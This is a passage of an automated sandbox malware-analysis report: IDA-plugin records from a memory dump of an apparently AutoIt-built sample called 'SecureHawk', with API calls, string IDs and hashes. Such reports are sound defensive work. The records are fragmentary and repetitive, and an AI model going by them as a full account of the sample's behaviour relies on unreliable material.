                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  • _wcscat.LIBCMT ref: 003334C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FullNamePath_memmove_wcscat
                                  • String ID: c;
                                  • API String ID: 257928180-468338140
                                  • Opcode ID: ef2c6edc0bba16269895e22bda5592cd33f5c96b11a4a590a9e3d899fa42023d
                                  • Instruction ID: 12e10e99cee8604e3bd2c412926fd5fd2cf27f1ca84224d15c810eb1fcf54ffc
                                  • Opcode Fuzzy Hash: ef2c6edc0bba16269895e22bda5592cd33f5c96b11a4a590a9e3d899fa42023d
                                  • Instruction Fuzzy Hash: AF11703591120C9ACB47FBA4D946EEEB7A8AF08390B1040A6FA499B291DA7097984B50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_memmove
                                  • String ID: EA06
                                  • API String ID: 1988441806-3962188686
                                  • Opcode ID: 326fd82a324cf124f954e6b90dea111bb6ad0e93bdaed5a9cf7e57b156eb8fde
                                  • Instruction ID: 7187962c1ab05cf65f58fc8075719f3dd3c6d1693eea375891e307cf07c02caf
                                  • Opcode Fuzzy Hash: 326fd82a324cf124f954e6b90dea111bb6ad0e93bdaed5a9cf7e57b156eb8fde
                                  • Instruction Fuzzy Hash: AC01F971D04218AEDB29CBA8CC56FEE7BFCDB15311F00419BF552D6181E474A608CB60
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 0034B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0034B5A0
                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00349706
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClassMessageNameSend_memmove
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 372448540-1403004172
                                  • Opcode ID: 3beaccb312a51c30405d99b9b3fdca554f1e189e57d679ccc6a333eaddd00b10
                                  • Instruction ID: 243041e74e28a68b15b4d4ae57d3c550d5940ab52b2f551b1d19d23ba9c5e1c5
                                  • Opcode Fuzzy Hash: 3beaccb312a51c30405d99b9b3fdca554f1e189e57d679ccc6a333eaddd00b10
                                  • Instruction Fuzzy Hash: 490184B1A42108ABDB16EBA0C862AFFB7EDDF15340F500116B8416B2C1DE55AE0897B1
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 0034B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0034B5A0
                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00349789
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClassMessageNameSend_memmove
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 372448540-1403004172
                                  • Opcode ID: f72366c945c055ff855c0471734ffe4c87c46773170c8648f22f2108be1cf627
                                  • Instruction ID: be6e9e265f725e5495cabbe7c4a5527b0cb4b23eef5ddce7025704ab5744f73a
                                  • Opcode Fuzzy Hash: f72366c945c055ff855c0471734ffe4c87c46773170c8648f22f2108be1cf627
                                  • Instruction Fuzzy Hash: 4A01A7B1A521046BDB16EB60C962EFFB7ECDF11340F500116B8056B2C1DE159E089771
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __calloc_crt
                                  • String ID: @R;
                                  • API String ID: 3494438863-3059581472
                                  • Opcode ID: e48b65717ff8fe23b5839832af3884d1dd00035c842d02331b474cd950bfe7a0
                                  • Instruction ID: 951809c27d9dd18b7aafe80126d3119a5cfdbe7986766b570a5d71be421ce840
                                  • Opcode Fuzzy Hash: e48b65717ff8fe23b5839832af3884d1dd00035c842d02331b474cd950bfe7a0
                                  • Instruction Fuzzy Hash: 1BF044723046128FF72F9BA9BC136E527A9F789724F510526E300CE192E77488C18694
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClassName_wcscmp
                                  • String ID: #32770
                                  • API String ID: 2292705959-463685578
                                  • Opcode ID: 479e5b414043eb64267b95d2cedb19da59fab243fc3e4f12eef297f151a5ca68
                                  • Instruction ID: 590fdcffddbb67484ed41e945023f74e0cc2aa3e09d765b37c501710af877937
                                  • Opcode Fuzzy Hash: 479e5b414043eb64267b95d2cedb19da59fab243fc3e4f12eef297f151a5ca68
                                  • Instruction Fuzzy Hash: 94E06132A0432827E7219A55DC05FD7F7BCDB46771F000057FD08D3040D5607A4487D0
                                  APIs
                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00348683
                                    • Part of subcall function 003134BA: _doexit.LIBCMT ref: 003134C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Message_doexit
                                  • String ID: AutoIt$Error allocating memory.
                                  • API String ID: 1993061046-4017498283
                                  • Opcode ID: 78320358bff7f5a72af6636574cd6ce8553c39c29b694756ca7f1ddcc9b7779f
                                  • Instruction ID: 9f1b850d697da4ac3b1ed357cdf513f07a62b8ad563e386df12016fda301e3d2
                                  • Opcode Fuzzy Hash: 78320358bff7f5a72af6636574cd6ce8553c39c29b694756ca7f1ddcc9b7779f
                                  • Instruction Fuzzy Hash: AED05B3138531836E25B3794AC17FCA7A488F05B52F100456FB045D1C34DE695D142D9
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?), ref: 0032FFC1
                                    • Part of subcall function 0036C4A1: LoadLibraryA.KERNEL32(kernel32.dll,?,003301AA,?), ref: 0036C4AF
                                    • Part of subcall function 0036C4A1: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0036C4C1
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003301B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                  • String ID: WIN_XPe
                                  • API String ID: 582185067-3257408948
                                  • Opcode ID: 0a91d93dee1414d3c964078aa7b20768e8117a1924c7157e4f5f8c9f5a13f656
                                  • Instruction ID: c47a6f09dd494018d007094ae5a1427f23a603d912ebdac9c23caadebd240153
                                  • Opcode Fuzzy Hash: 0a91d93dee1414d3c964078aa7b20768e8117a1924c7157e4f5f8c9f5a13f656
                                  • Instruction Fuzzy Hash: 4FF03970814129EFCB1BDB91DA98AECBBBCAB09304F2000A6E142B2090C7B08F44CF20
                                  APIs
                                  • DestroyIcon.USER32(,j;0j;,003B6A2C,003B6890,?,00305A53,003B6A2C,003B6A30,?,00000004), ref: 00305823
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: DestroyIcon
                                  • String ID: ,j;0j;$SZ0,j;0j;
                                  • API String ID: 1234817797-3161902991
                                  • Opcode ID: f51a485bace4144d0c834b66e60ac68f0b0205f01905f7079afa9309734e4251
                                  • Instruction ID: aab8926241d486b53d51de4fdd5913d8902d1df585e364cc11d2665b04ca45b5
                                  • Opcode Fuzzy Hash: f51a485bace4144d0c834b66e60ac68f0b0205f01905f7079afa9309734e4251
                                  • Instruction Fuzzy Hash: 12E0C73211420AEBEB220F0CD804B96FBECAF61321F65C026E880460A0D3B16CE0CF98